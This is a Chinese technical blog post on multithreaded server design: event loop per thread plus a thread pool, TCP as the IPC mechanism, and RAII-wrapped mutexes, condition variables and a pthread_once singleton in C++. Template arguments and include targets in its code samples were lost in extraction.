此种模型下,__程序里的每个 IO 线程有一个 event loop (或者叫 Reactor),用于处理读写和定时事件__(无论周期性的还是单次的),代码框架跟第 2 节一样。
|
||||
这种方式的好处是:
|
||||
|
||||
l 线程数目基本固定,可以在程序启动的时候设置,不会频繁创建与销毁。
|
||||
l 可以很方便地在__线程间调配负载__。
|
||||
|
||||
event loop 代表了线程的主循环,需要让哪个线程干活,就把__ timer 或 IO channel (TCP connection)__ 注册到那个线程的 loop 里即可。对实时性有要求的 connection 可以单独用一个线程;数据量大的 connection 可以独占一个线程,并把数据处理任务分摊到另几个线程中;其他次要的辅助性 connections 可以共享一个线程。
|
||||
|
||||
对于 non-trivial 的服务端程序,一般会采用 non-blocking IO + IO multiplexing,**每个 connection/acceptor 都会注册到某个 Reactor 上,程序里有多个 Reactor,每个线程至多有一个 Reactor。**
|
||||
|
||||
多线程程序对 Reactor 提出了更高的要求,那就是“线程安全”。要允许一个线程往别的线程的 loop 里塞东西,这个 loop 必须得是线程安全的。
|
||||
|
||||
**2) 线程池**
|
||||
不过,对于没有 IO 光有计算任务的线程,使用 event loop 有点浪费,我会用有一种补充方案,即用 __blocking queue 实现的任务队列__(TaskQueue):
|
||||
|
||||
blocking_queue <**boost::function **> taskQueue; // 线程安全的__阻塞队列__
|
||||
|
||||
void worker_thread()
|
||||
{
|
||||
while (!quit) {
|
||||
boost::function task = taskQueue.take(); // this blocks
|
||||
task(); // 在产品代码中需要考虑异常处理
|
||||
}
|
||||
}
|
||||
|
||||
用这种方式实现线程池特别容易:
|
||||
启动容量为 N 的线程池:
|
||||
int N = num_of_computing_threads;
|
||||
for (int i = 0; i < N; ++i) {
|
||||
create_thread(&worker_thread); // 伪代码:启动线程
|
||||
}
|
||||
|
||||
使用起来也很简单:
|
||||
boost::function task = boost::bind(&Foo::calc, this);
|
||||
taskQueue.post(task);
|
||||
|
||||
上面十几行代码就实现了一个简单的固定数目的线程池,功能大概相当于 Java 5 的 ThreadPoolExecutor 的某种“配置”。当然,在真实的项目中,这些代码都应该封装到一个 class 中,而不是使用全局对象。另外需要注意一点:Foo 对象的生命期,我的另一篇博客《当析构函数遇到多线程——C++ 中线程安全的__对象回调__》详细讨论了这个问题
|
||||
|
||||
除了任务队列,还可以用 blocking_queue 实现__数据的消费者-生产者队列__,即 T 的是数据类型而非**函数对象**,queue 的消费者(s)从中拿到数据进行处理。这样做比 task queue 更加 specific 一些。
|
||||
|
||||
blocking_queue 是多线程编程的利器,它的实现可参照 Java 5 util.concurrent 里的** (Array|Linked)BlockingQueue**,通常 C++ 可以用 deque 来做底层的容器。Java 5 里的代码可读性很高,代码的基本结构和教科书一致(1 个 mutex,2 个 condition variables),健壮性要高得多。如果不想自己实现,用现成的库更好。(我没有用过免费的库,这里就不乱推荐了,有兴趣的同学可以试试 Intel Threading Building Blocks 里的 concurrent_queue。)
|
||||
|
||||
===== 归纳 =====
|
||||
|
||||
总结起来,我推荐的多线程服务端编程模式为:event loop per thread + thread pool。
|
||||
|
||||
l event loop 用作 non-blocking IO 和__定时器__。
|
||||
l thread pool 用来做计算,具体可以是**任务队列或消费者-生产者队列**。
|
||||
|
||||
以这种方式写服务器程序,需要一个**优质的基于 Reactor 模式的网络库**来支撑,我只用过 in-house 的产品,无从比较并推荐市面上常见的 C++ 网络库,抱歉。
|
||||
|
||||
程序里具体用几个 loop、线程池的大小等参数需要根据应用来设定,基本的原则是“__阻抗匹配__”,使得 CPU 和 IO 都能高效地运作,具体的考虑点容我以后再谈。
|
||||
|
||||
这里没有谈线程的退出,留待下一篇 blog“多线程编程反模式”探讨。
|
||||
|
||||
此外,程序里或许还有个别**执行特殊任务的线程**,比如 logging,这对应用程序来说基本是不可见的,但是在分配资源(CPU 和 IO)的时候要算进去,以免高估了系统的容量。
|
||||
|
||||
===== 4 进程间通信与线程间通信 =====
|
||||
|
||||
Linux 下进程间通信 (IPC) 的方式数不胜数,光 UNPv2 列出的就有:pipe、FIFO、POSIX 消息队列、共享内存、信号 (signals) 等等,更不必说 Sockets 了。同步原语 (synchronization primitives) 也很多,互斥器 (mutex)、条件变量 (condition variable)、读写锁 (reader-writer lock)、__文件锁 __(Record locking)、信号量 (Semaphore) 等等。
|
||||
|
||||
如何选择呢?根据我的个人经验,贵精不贵多,认真挑选三四样东西就能完全满足我的工作需要,而且每样我都能用得很熟,,不容易犯错。
|
||||
|
||||
===== 5 进程间通信 =====
|
||||
|
||||
__进程间通信我首选 Sockets__(主要指 TCP,我没有用过 UDP,也不考虑 Unix domain 协议),其最大的好处在于:可以跨主机,具有伸缩性。反正都是多进程了,如果一台机器处理能力不够,很自然地就能用多台机器来处理。把进程分散到同一局域网的多台机器上,程序改改 host:port 配置就能继续用。相反,前面列出的其他 IPC 都不能跨机器(比如__共享内存效率最高__,但再怎么着也不能高效地共享两台机器的内存),限制了 scalability。
|
||||
|
||||
在编程上,TCP sockets 和 pipe 都是__一个文件描述符__,用来收发字节流,都可以 read/write/fcntl/select/poll 等。不同的是,TCP 是双向的,pipe 是单向的 (Linux),进程间双向通讯还得开两个文件描述符,不方便;而且进程要有父子关系才能用 pipe,这些都限制了 pipe 的使用。在收发字节流这一通讯模型下,没有比 sockets/TCP 更自然的 IPC 了。当然,pipe 也有一个经典应用场景,那就是写 __Reactor/Selector 时用来异步唤醒 select__ (或等价的 poll/epoll) 调用(Sun JVM 在 Linux 就是这么做的)。
|
||||
|
||||
TCP port 是由一个进程独占,且操作系统会自动回收(listening port 和已建立连接的 TCP socket 都是文件描述符,在进程结束时操作系统会关闭所有文件描述符)。这说明,即使程序意外退出,也不会给系统留下垃圾,程序重启之后能比较容易地恢复,而不需要重启操作系统(用跨进程的 mutex 就有这个风险)。还有一个好处,既然 port 是独占的,那么可以防止程序重复启动(后面那个进程抢不到 port,自然就没法工作了),造成意料之外的结果。
|
||||
|
||||
两个进程通过 TCP 通信,如果一个崩溃了,操作系统会关闭连接,这样另一个进程几乎立刻就能感知,可以__快速 failover__。当然,**应用层的心跳**也是必不可少的,我以后在讲服务端的日期与时间处理的时候还会谈到心跳协议的设计。
|
||||
|
||||
与其他 IPC 相比,TCP 协议的一个自然好处是“__可记录可重现__”,tcpdump/Wireshark 是解决两个进程间协议/状态争端的好帮手。
|
||||
|
||||
另外,如果网络库带“连接重试”功能的话,我们可以不要求系统里的进程以特定的顺序启动,任何一个进程都能单独重启,这对开发牢靠的分布式系统意义重大。
|
||||
|
||||
marshal ['mɑ:ʃəl] n. 陆空军元帅, 典礼官, 司仪官 v. 整顿, 配置, ** 汇集**
|
||||
|
||||
使用 TCP 这种__字节流__ (byte stream) 方式通信,会有 marshal/unmarshal 的开销,这要求我们选用合适的**消息格式**,准确地说是** wire format**。这将是我下一篇 blog 的主题,目前我推荐 __Google Protocol Buffers__。
|
||||
|
||||
有人或许会说,具体问题具体分析,如果两个进程在同一台机器,就用共享内存,否则就用 TCP,比如 MS SQL Server 就同时支持这两种通信方式。我问,是否值得为那么一点性能提升而让代码的复杂度大大增加呢?TCP 是__字节流协议__,只能顺序读取,有写缓冲;共享内存是__消息协议__,a 进程填好一块内存让 b 进程来读,基本是“停等”方式。要把这两种方式揉到一个程序里,需要建一个**抽象层**,封装两种 IPC。这会带来不透明性,并且增加测试的复杂度,而且万一通信的某一方崩溃,状态 reconcile 也会比 sockets 麻烦。为我所不取。再说了,你舍得让几万块买来的 SQL Server 和你的程序分享机器资源吗?产品里的数据库服务器往往是独立的高配置服务器,一般不会同时运行其他占资源的程序。
|
||||
|
||||
TCP 本身是个数据流协议,除了直接使用它来通信,还可以在此之上构建 __RPC/REST/SOAP __之类的上层通信协议,这超过了本文的范围。另外,除了点对点的通信之外,应用级的广播协议也是非常有用的,可以方便地构建可观可控的分布式系统。
|
||||
|
||||
本文不具体讲 Reactor 方式下的网络编程,其实这里边有很多值得注意的地方,比如带 back off 的 retry connecting,用优先队列来组织 timer 等等,留作以后分析吧。
|
||||
|
||||
===== 6 线程间同步 =====
|
||||
|
||||
线程同步的四项原则,按重要性排列:
|
||||
|
||||
1. 首要原则是尽量**最低限度地共享对象,减少需要同步的场合**。一个对象能不暴露给别的线程就不要暴露;如果要暴露,优先考虑 immutable 对象;实在不行才暴露可修改的对象,并用同步措施来充分保护它。
|
||||
2. 其次是使用**高级的**__并发编程构件__,如 TaskQueue、Producer-Consumer Queue、CountDownLatch 等等;
|
||||
3. 最后不得已必须使用底层同步原语 (primitives) 时,只用__非递归的互斥器和条件变量__,偶尔用一用读写锁;
|
||||
4. 不自己编写 lock-free 代码,不去凭空猜测“哪种做法性能会更好”,比如 spin lock vs. mutex。
|
||||
|
||||
前面两条很容易理解,这里着重讲一下第 3 条:底层同步原语的使用。
|
||||
|
||||
=== 互斥器 (mutex) ===
|
||||
|
||||
互斥器 (mutex) 恐怕是使用得最多的同步原语,粗略地说,__它保护了临界区__,一个时刻最多只能有一个线程在临界区内活动。(请注意,我谈的是 pthreads 里的 mutex,不是 Windows 里的重量级跨进程 Mutex。)单独使用 mutex 时,我们主要**为了保护共享数据**。我个人的原则是:
|
||||
|
||||
l __用 RAII 手法封装 mutex __的创建、销毁、加锁、解锁这四个操作。
|
||||
l 只用非递归的 mutex(即不可重入的 mutex)。
|
||||
l 不手工调用 lock() 和 unlock() 函数,一切**交给栈上的 Guard 对象**的构造和析构函数负责,Guard 对象的生命期正好等于临界区(分析对象在什么时候析构是 C++ 程序员的基本功)。这样我们保证在同一个函数里加锁和解锁,避免在 foo() 里加锁,然后跑到 bar() 里解锁。
|
||||
l 在每次构造 Guard 对象的时候,思考一路上(调用栈上)已经持有的锁,防止因__加锁顺序不同__而导致死锁 (deadlock)。由于 Guard 对象是栈上对象,看函数调用栈就能分析用锁的情况,非常便利。
|
||||
|
||||
次要原则有:
|
||||
|
||||
l 不使用跨进程的 mutex,__进程间通信只用 TCP sockets__。
|
||||
l 加锁解锁在同一个线程,线程 a 不能去 unlock 线程 b 已经锁住的 mutex。(RAII 自动保证)
|
||||
l 别忘了解锁。(RAII 自动保证)
|
||||
l 不重复解锁。(RAII 自动保证)
|
||||
l 必要的时候可以考虑用 PTHREAD_MUTEX_ERRORCHECK 来排错
|
||||
|
||||
用 RAII 封装这几个操作是通行的做法,这几乎是__ C++ 的标准实践__,后面我会给出具体的代码示例,相信大家都已经写过或用过类似的代码了。Java 里的 synchronized 语句和 C# 的 using 语句也有类似的效果,即保证锁的生效期间等于一个作用域,不会因异常而忘记解锁。
|
||||
|
||||
Mutex 恐怕是最简单的同步原语,安照上面的几条原则,几乎不可能用错。我自己从来没有违背过这些原则,编码时出现问题都很快能招到并修复。
|
||||
|
||||
== 跑题:非递归的 mutex ==
|
||||
|
||||
谈谈我坚持使用非递归的互斥器的个人想法。
|
||||
|
||||
Mutex 分为__递归 (recursive) 和非递归(non-recursive)__两种,这是 POSIX 的叫法,另外的名字是可重入 (Reentrant) 与非可重入。这两种 mutex 作为线程间 (inter-thread) 的同步工具时没有区别,它们的惟一区别在于:同一个线程可以重复对 recursive mutex 加锁,但是不能重复对 non-recursive mutex 加锁。
|
||||
|
||||
首选非递归 mutex,绝对不是为了性能,而是为了体现设计意图。non-recursive 和 recursive 的性能差别其实不大,因为少用一个计数器,前者略快一点点而已。在同一个线程里多次对 non-recursive mutex 加锁会立刻导致死锁,我认为这是它的优点,能帮助我们思考代码对锁的期求,并且及早(在编码阶段)发现问题。
|
||||
|
||||
毫无疑问 recursive mutex 使用起来要方便一些,因为不用考虑一个线程会自己把自己给锁死了,我猜这也是 Java 和 Windows 默认提供 recursive mutex 的原因。(Java 语言自带的 intrinsic lock 是可重入的,它的 concurrent 库里提供 ReentrantLock,Windows 的 CRITICAL_SECTION 也是可重入的。似乎它们都不提供轻量级的 non-recursive mutex。)
|
||||
|
||||
正因为它方便,recursive mutex 可能会隐藏代码里的一些问题。典型情况是你以为拿到一个锁就能修改对象了,没想到外层代码已经拿到了锁,正在修改(或读取)同一个对象呢。具体的例子:
|
||||
|
||||
std::vector foos;
|
||||
|
||||
MutexLock mutex;
|
||||
|
||||
void post(const Foo& f)
|
||||
|
||||
{
|
||||
|
||||
MutexLockGuard lock(mutex);
|
||||
|
||||
foos.push_back(f);
|
||||
|
||||
}
|
||||
|
||||
void traverse()
|
||||
|
||||
{
|
||||
|
||||
MutexLockGuard lock(mutex);
|
||||
|
||||
for (auto it = foos.begin(); it != foos.end(); ++it) { // 用了 0x 新写法
|
||||
|
||||
it->doit();
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
post() 加锁,然后修改 foos 对象; traverse() 加锁,然后遍历 foos 数组。将来有一天,Foo::doit() 间接调用了 post() (这在逻辑上是错误的),那么会很有戏剧性的:
|
||||
|
||||
1. Mutex 是非递归的,于是死锁了。
|
||||
2. Mutex 是递归的,由于 push_back 可能(但不总是)导致 vector 迭代器失效,程序偶尔会 crash。
|
||||
|
||||
这时候就能体现 non-recursive 的优越性:把程序的逻辑错误暴露出来。死锁比较容易 debug,把各个线程的调用栈打出来((gdb) thread apply all bt),只要每个函数不是特别长,很容易看出来是怎么死的。(另一方面支持了函数不要写过长。)或者可以用 PTHREAD_MUTEX_ERRORCHECK 一下子就能找到错误(前提是 MutexLock 带 debug 选项。)
|
||||
|
||||
程序反正要死,不如死得有意义一点,让验尸官的日子好过些。
|
||||
|
||||
如果一个函数既可能在已加锁的情况下调用,又可能在未加锁的情况下调用,那么就拆成两个函数:
|
||||
|
||||
1. 跟原来的函数同名,函数加锁,转而调用第 2 个函数。
|
||||
|
||||
2. 给函数名加上后缀 WithLockHold,不加锁,把原来的函数体搬过来。
|
||||
|
||||
就像这样:
|
||||
|
||||
void post(const Foo& f)
|
||||
|
||||
{
|
||||
|
||||
MutexLockGuard lock(mutex);
|
||||
|
||||
postWithLockHold(f); // 不用担心开销,编译器会自动内联的
|
||||
|
||||
}
|
||||
|
||||
// 引入这个函数是为了体现代码作者的意图,尽管 push_back 通常可以手动内联
|
||||
|
||||
void postWithLockHold(const Foo& f)
|
||||
|
||||
{
|
||||
|
||||
foos.push_back(f);
|
||||
|
||||
}
|
||||
|
||||
这有可能出现两个问题(感谢水木网友 ilovecpp 提出):a) 误用了加锁版本,死锁了。b) 误用了不加锁版本,数据损坏了。
|
||||
|
||||
对于 a),仿造前面的办法能比较容易地排错。对于 b),如果 pthreads 提供 isLocked() 就好办,可以写成:
|
||||
|
||||
void postWithLockHold(const Foo& f)
|
||||
|
||||
{
|
||||
|
||||
assert(mutex.isLocked()); // 目前只是一个愿望
|
||||
|
||||
// ...
|
||||
|
||||
}
|
||||
|
||||
另外,WithLockHold 这个显眼的后缀也让程序中的误用容易暴露出来。
|
||||
|
||||
C++ 没有 annotation,不能像 Java 那样给 method 或 field 标上 @GuardedBy 注解,需要程序员自己小心在意。虽然这里的办法不能一劳永逸地解决全部多线程错误,但能帮上一点是一点了。
|
||||
|
||||
我还没有遇到过需要使用 recursive mutex 的情况,我想将来遇到了都可以借助 wrapper 改用 non-recursive mutex,代码只会更清晰。
|
||||
|
||||
=== 回到正题 ===
|
||||
|
||||
本文这里只谈了 mutex 本身的正确使用,在 C++ 里多线程编程还会遇到其他很多 race condition,请参考拙作《当析构函数遇到多线程——C++ 中线程安全的对象回调》。请注意这里的 class 命名与那篇文章有所不同。我现在认为 MutexLock 和 MutexLockGuard 是更好的名称。
|
||||
|
||||
性能注脚:Linux 的 pthreads mutex 采用 futex 实现,不必每次加锁解锁都陷入系统调用,效率不错。Windows 的 CRITICAL_SECTION 也是类似。
|
||||
|
||||
=== 条件变量 ===
|
||||
|
||||
条件变量 (condition variable) 顾名思义是__一个或多个线程等待某个布尔表达式为真,即等待别的线程“唤醒”它__。条件变量的学名叫管程 (monitor)。Java Object 内置的 wait(), notify(), notifyAll() 即是条件变量(它们以容易用错著称)。条件变量只有一种正确使用的方式,对于 wait() 端:
|
||||
|
||||
1. 必须与 mutex 一起使用,该布尔表达式的读写需受此 mutex 保护
|
||||
2. 在 mutex 已上锁的时候才能调用 wait()
|
||||
3. 把判断布尔条件和 wait() 放到 while 循环中
|
||||
|
||||
写成代码是:
|
||||
|
||||
MutexLock mutex;
|
||||
Condition cond(mutex);
|
||||
std::deque queue;
|
||||
int dequeue()
|
||||
{
|
||||
MutexLockGuard lock(mutex);
|
||||
while (queue.empty()) { // 必须用循环;必须在判断之后再 wait()
|
||||
cond.wait(); // 这一步会原子地 unlock mutex 并进入 blocking,不会与 enqueue 死锁
|
||||
}
|
||||
|
||||
assert(!queue.empty());
|
||||
int top = queue.front();
|
||||
queue.pop_front();
|
||||
return top;
|
||||
}
|
||||
|
||||
对于 signal/broadcast 端:
|
||||
|
||||
1. 不一定要在 mutex 已上锁的情况下调用 signal (理论上)
|
||||
2. 在 signal 之前一般要修改布尔表达式
|
||||
3. 修改布尔表达式通常要用 mutex 保护(至少用作 full memory barrier)
|
||||
写成代码是:
|
||||
|
||||
void enqueue(int x)
|
||||
{
|
||||
MutexLockGuard lock(mutex);
|
||||
queue.push_back(x);
|
||||
cond.notify();
|
||||
}
|
||||
|
||||
上面的 dequeue/enqueue 实际上实现了一个简单的 unbounded BlockingQueue。
|
||||
|
||||
条件变量是非常底层的同步原语,很少直接使用,一般都是用它来实现高层的同步措施,如 BlockingQueue 或 CountDownLatch。
|
||||
|
||||
=== 读写锁与其他 ===
|
||||
|
||||
读写锁 (Reader-Writer lock),读写锁是个优秀的抽象,它明确区分了 read 和 write 两种行为。需要注意的是,reader lock 是可重入的,writer lock 是不可重入(包括不可提升 reader lock)的。这正是我说它“优秀”的主要原因。
|
||||
|
||||
遇到并发读写,如果条件合适,我会用《__借 shared_ptr 实现线程安全的 copy-on-write__》介绍的办法,而不用读写锁。当然这不是绝对的。
|
||||
|
||||
信号量 (Semaphore),我没有遇到过需要使用信号量的情况,无从谈及个人经验。
|
||||
|
||||
说一句大逆不道的话,如果程序里需要解决如“**哲学家就餐**”之类的复杂 IPC 问题,我认为应该首先考察几个设计,为什么线程之间会有如此复杂的资源争抢(一个线程要同时抢到两个资源,一个资源可以被两个线程争夺)?能不能把“想吃饭”这个事情专门交给一个为各位哲学家分派餐具的线程来做,然后每个哲学家等在一个简单的 condition variable 上,到时间了有人通知他去吃饭?从哲学上说,教科书上的解决方案是平权,每个哲学家有自己的线程,自己去拿筷子;我宁愿用集权的方式,用一个线程专门管餐具的分配,让其他哲学家线程拿个号等在食堂门口好了。这样不损失多少效率,却让程序简单很多。虽然 Windows 的 WaitForMultipleObjects 让这个问题 trivial 化,在 Linux 下正确模拟 WaitForMultipleObjects 不是普通程序员该干的。
|
||||
|
||||
=== 封装 MutexLock、MutexLockGuard 和 Condition ===
|
||||
|
||||
本节把前面用到的 MutexLock、MutexLockGuard、Condition classes 的代码列出来,前面两个 classes 没多大难度,后面那个有点意思。
|
||||
|
||||
MutexLock **封装临界区**(Critical secion),这是一个简单的__资源类__,用 RAII 手法 [CCS:13]封装__互斥器的创建与销毁__。临界区在 Windows 上是 CRITICAL_SECTION,是可重入的;在 Linux 下是 pthread_mutex_t,默认是不可重入的。MutexLock 一般是别的 class 的__数据成员__。
|
||||
|
||||
MutexLockGuard 封装**临界区的进入和退出**,即__加锁和解锁__。MutexLockGuard 一般是个**栈上对象**,它的**作用域刚好等于临界区域**。
|
||||
|
||||
这两个 classes 应该能在纸上默写出来,没有太多需要解释的:
|
||||
|
||||
#include
|
||||
#include
|
||||
class MutexLock : **boost::noncopyable**
|
||||
{
|
||||
public:
|
||||
MutexLock() // 为了节省版面,单行函数都没有正确缩进
|
||||
{ pthread_mutex_init(&mutex_, NULL); }
|
||||
|
||||
~MutexLock()
|
||||
{ pthread_mutex_destroy(&mutex_); }
|
||||
|
||||
void lock() // 程序一般不主动调用
|
||||
{ pthread_mutex_lock(&mutex_); }
|
||||
|
||||
void unlock() // 程序一般不主动调用
|
||||
{ pthread_mutex_unlock(&mutex_); }
|
||||
|
||||
pthread_mutex_t* **getPthreadMutex() **// 仅供 Condition 调用,严禁自己调用
|
||||
{ return &mutex_; }
|
||||
|
||||
private:
|
||||
__pthread_mutex_t__ mutex_;
|
||||
};
|
||||
|
||||
|
||||
class MutexLockGuard : boost::noncopyable
|
||||
{
|
||||
public:
|
||||
explicit **MutexLockGuard**(MutexLock& mutex) : mutex_(mutex)
|
||||
{ mutex_.lock(); }
|
||||
|
||||
~MutexLockGuard()
|
||||
{ mutex_.unlock(); }
|
||||
|
||||
private:
|
||||
__MutexLock& __mutex_;
|
||||
};
|
||||
|
||||
#define MutexLockGuard(x) static_assert(false, "missing mutex guard var name")
|
||||
|
||||
注意代码的最后一行定义了一个宏,这个宏的作用是防止程序里出现如下错误:
|
||||
|
||||
void doit()
|
||||
{
|
||||
|
||||
MutexLockGuard(mutex); // 没有变量名,**产生一个临时对象又马上销毁了**,没有锁住临界区
|
||||
// 正确写法是 MutexLockGuard lock(mutex);
|
||||
// 临界区
|
||||
}
|
||||
|
||||
这里 MutexLock 没有提供 trylock() 函数,因为我没有用过它,我想不出什么时候程序需要“试着去锁一锁”,或许我写过的代码太简单了。
|
||||
|
||||
我见过有人把 MutexLockGuard 写成 template,我没有这么做是因为它的模板类型参数只有 MutexLock 一种可能,没有必要随意增加灵活性,于是我人肉把模板具现化 (instantiate) 了。此外一种更激进的写法是,把 lock/unlock 放到 private 区,然后把 Guard 设为 MutexLock 的 friend,我认为在注释里告知程序员即可,另外 check-in 之前的 code review 也很容易发现误用的情况 (grep getPthreadMutex)。
|
||||
|
||||
这段代码没有达到工业强度:a) Mutex 创建为 PTHREAD_MUTEX_DEFAULT 类型,而不是我们预想的 PTHREAD_MUTEX_NORMAL 类型(实际上这二者很可能是等同的),严格的做法是用 mutexattr 来显示指定 mutex 的类型。b) 没有检查返回值。这里不能用 assert 检查返回值,因为 assert 在 release build 里是空语句。我们检查返回值的意义在于防止 ENOMEM 之类的资源不足情况,这一般只可能在负载很重的产品程序中出现。一旦出现这种错误,程序必须立刻清理现场并主动退出,否则会莫名其妙地崩溃,给事后调查造成困难。这里我们需要 non-debug 的 assert,或许 google-glog 的 CHECK() 是个不错的思路。
|
||||
|
||||
以上两点改进留作练习。
|
||||
|
||||
Condition class 的实现有点意思。
|
||||
|
||||
Pthreads condition variable 允许在 wait() 的时候指定 mutex,但是我想不出什么理由一个 condition variable 会和不同的 mutex 配合使用。Java 的 intrinsic condition 和 Conditon class 都不支持这么做,因此我觉得可以放弃这一灵活性,老老实实一对一好了。相反 boost::thread 的 condition_varianle 是在 wait 的时候指定 mutex,请参观其同步原语的庞杂设计:
|
||||
|
||||
l Concept 有四种 Lockable, TimedLockable, SharedLockable, UpgradeLockable.
|
||||
|
||||
l Lock 有五六种: lock_guard, unique_lock, shared_lock, upgrade_lock, upgrade_to_unique_lock, scoped_try_lock.
|
||||
|
||||
l Mutex 有七种:mutex, try_mutex, timed_mutex, recursive_mutex, recursive_try_mutex, recursive_timed_mutex, shared_mutex.
|
||||
|
||||
恕我愚钝,见到 boost::thread 这样如 Rube Goldberg Machine 一样“灵活”的库我只得三揖绕道而行。这些 class 名字也很无厘头,为什么不老老实实用 reader_writer_lock 这样的通俗名字呢?非得增加精神负担,自己发明新名字。我不愿为这样的灵活性付出代价,宁愿自己做几个简简单单的一看就明白的 classes 来用,这种简单的几行代码的轮子造造也无妨。提供灵活性固然是本事,然而在不需要灵活性的地方把代码写死,更需要大智慧。
|
||||
|
||||
下面这个 Condition 简单地封装了 pthread cond var,用起来也容易,见本节前面的例子。这里我用 notify/notifyAll 作为函数名,因为 signal 有别的含义,C++ 里的 signal/slot,C 里的 signal handler 等等。就别 overload 这个术语了。
|
||||
|
||||
class Condition : boost::noncopyable
|
||||
|
||||
{
|
||||
|
||||
public:
|
||||
|
||||
Condition(MutexLock& mutex) : mutex_(mutex)
|
||||
|
||||
{ pthread_cond_init(&pcond_, NULL); }
|
||||
|
||||
~Condition()
|
||||
|
||||
{ pthread_cond_destroy(&pcond_); }
|
||||
|
||||
void wait()
|
||||
|
||||
{ pthread_cond_wait(&pcond_, mutex_.getPthreadMutex()); }
|
||||
|
||||
void notify()
|
||||
|
||||
{ pthread_cond_signal(&pcond_); }
|
||||
|
||||
void notifyAll()
|
||||
|
||||
{ pthread_cond_broadcast(&pcond_); }
|
||||
|
||||
private:
|
||||
|
||||
MutexLock& mutex_;
|
||||
|
||||
pthread_cond_t pcond_;
|
||||
|
||||
};
|
||||
|
||||
如果一个 class 要包含 MutexLock 和 Condition,请注意它们的声明顺序和初始化顺序,mutex_ 应先于 condition_ 构造,并作为后者的构造参数:
|
||||
|
||||
class CountDownLatch
|
||||
|
||||
{
|
||||
|
||||
public:
|
||||
|
||||
CountDownLatch(int count)
|
||||
|
||||
: count_(count),
|
||||
|
||||
mutex_(),
|
||||
|
||||
condition_(mutex_)
|
||||
|
||||
{ }
|
||||
|
||||
private:
|
||||
|
||||
int count_;
|
||||
|
||||
MutexLock mutex_; // 顺序很重要
|
||||
|
||||
Condition condition_;
|
||||
|
||||
};
|
||||
|
||||
请允许我再次强调,虽然本节花了大量篇幅介绍如何正确使用 mutex 和 condition variable,但并不代表我鼓励到处使用它们。这两者都是非常底层的同步原语,主要用来实现更高级的并发编程工具,__一个多线程程序里如果大量使用 mutex 和 condition variable 来同步,基本跟用铅笔刀锯大树(孟岩语)没啥区别__。
|
||||
|
||||
===== 线程安全的 Singleton 实现 =====
|
||||
|
||||
研究 Signleton 的线程安全实现的历史你会发现很多有意思的事情,一度人们认为 Double checked locking 是王道,兼顾了效率与正确性。后来有神牛指出由于乱序执行的影响,DCL 是靠不住的。(这个又让我想起了 SQL 注入,十年前用字符串拼接出 SQL 语句是 Web 开发的通行做法,直到有一天有人利用这个漏洞越权获得并修改网站数据,人们才幡然醒悟,赶紧修补。)Java 开发者还算幸运,可以借助内部静态类的装载来实现。C++ 就比较惨,要么次次锁,要么 eager initialize、或者动用 memory barrier 这样的大杀器。接下来 Java 5 修订了内存模型,并增强了 volatile 的语义,这下 DCL (with volatile) 又是安全的了。然而 C++ 的内存模型还在修订中,C++ 的 volatile 目前还不能(将来也难说)保证 DCL 的正确性(只在 VS2005+ 上有效)。
|
||||
|
||||
其实没那么麻烦,在实践中用 pthread once 就行:
|
||||
|
||||
#include
|
||||
|
||||
template
|
||||
|
||||
class Singleton : boost::noncopyable
|
||||
|
||||
{
|
||||
|
||||
public:
|
||||
|
||||
static T& instance()
|
||||
|
||||
{
|
||||
|
||||
pthread_once(&ponce_, &Singleton::init);
|
||||
|
||||
return *value_;
|
||||
|
||||
}
|
||||
|
||||
static void init()
|
||||
|
||||
{
|
||||
|
||||
value_ = new T();
|
||||
|
||||
}
|
||||
|
||||
private:
|
||||
|
||||
static pthread_once_t ponce_;
|
||||
|
||||
static T* value_;
|
||||
|
||||
};
|
||||
|
||||
template
|
||||
|
||||
pthread_once_t Singleton::ponce_ = PTHREAD_ONCE_INIT;
|
||||
|
||||
template
|
||||
|
||||
T* Singleton::value_ = NULL;
|
||||
|
||||
上面这个 Singleton 没有任何花哨的技巧,用 pthread_once_t 来保证 lazy-initialization 的线程安全。使用方法也很简单:
|
||||
|
||||
Foo& foo = Singleton::instance();
|
||||
|
||||
当然,这个 Singleton 没有考虑对象的销毁,在服务器程序里,这不是一个问题,因为当程序退出的时候自然就释放所有资源了(前提是程序里不使用不能由操作系统自动关闭的资源,比如跨进程的 Mutex)。另外,这个 Singleton 只能调用默认构造函数,如果用户想要指定 T 的构造方式,我们可以用模板特化 (template specialization) 技术来提供一个定制点,这需要引入另一层间接。
|
||||
|
||||
归纳
|
||||
|
||||
l 进程间通信首选 TCP sockets
|
||||
|
||||
l 线程同步的四项原则
|
||||
|
||||
l 使用互斥器的条件变量的惯用手法 (idiom),关键是 RAII
|
||||
|
||||
用好这几样东西,基本上能应付多线程服务端开发的各种场合,只是或许有人会觉得性能没有发挥到极致。我认为,先把程序写正确了,再考虑性能优化,这在多线程下任然成立。让一个正确的程序变快,远比“让一个快的程序变正确”容易得多。
|
||||
|
||||
===== 7 总结 =====
|
||||
|
||||
在现代的多核计算背景下,线程是不可避免的。多线程编程是一项重要的个人技能,不能因为它难就本能地排斥,现在的软件开发比起 10 年 20 年前已经难了不知道多少倍。掌握多线程编程,才能更理智地选择用还是不用多线程,因为你能预估多线程实现的难度与收益,在一开始做出正确的选择。要知道把一个单线程程序改成多线程的,往往比重头实现一个多线程的程序更难。
|
||||
|
||||
掌握同步原语和它们的适用场合时多线程编程的基本功。以我的经验,熟练使用文中提到的同步原语,就能比较容易地编写线程安全的程序。本文没有考虑 signal 对多线程编程的影响,Unix 的 signal 在多线程下的行为比较复杂,一般要靠底层的网络库 (如 Reactor) 加以屏蔽,避免干扰上层应用程序的开发。
|
||||
|
||||
通篇来看,“效率”并不是我的主要考虑点,a) TCP 不是效率最高的 IPC,b) 我提倡正确加锁而不是自己编写 lock-free 算法(使用原子操作除外)。在程序的复杂度和性能之前取得平衡,并经考虑未来两三年扩容的可能(无论是 CPU 变快、核数变多,还是机器数量增加,网络升级)。下一篇“多线程编程的反模式”会考察伸缩性方面的常见错误,我认为在分布式系统中,伸缩性 (scalability) 比单机的性能优化更值得投入精力。
|
||||
|
||||
这篇文章记录了我目前对多线程编程的理解,用文中介绍的手法,我能解决自己面临的全部多线程编程任务。如果文章的观点与您不合,比如您使用了我没有推荐使用的技术或手法(共享内存、信号量等等),只要您理由充分,但行无妨。
|
||||
|
||||
这篇文章本来还有两节“多线程编程的反模式”与“多线程的应用场景”,考虑到字数已经超过一万了,且听下回分解吧 多线程服务器的常用编程模型 - chenlvhong_1989 - chenlvhong_1989 的博客
|
||||
|
||||
===== 后文预览:Sleep 反模式 =====
|
||||
|
||||
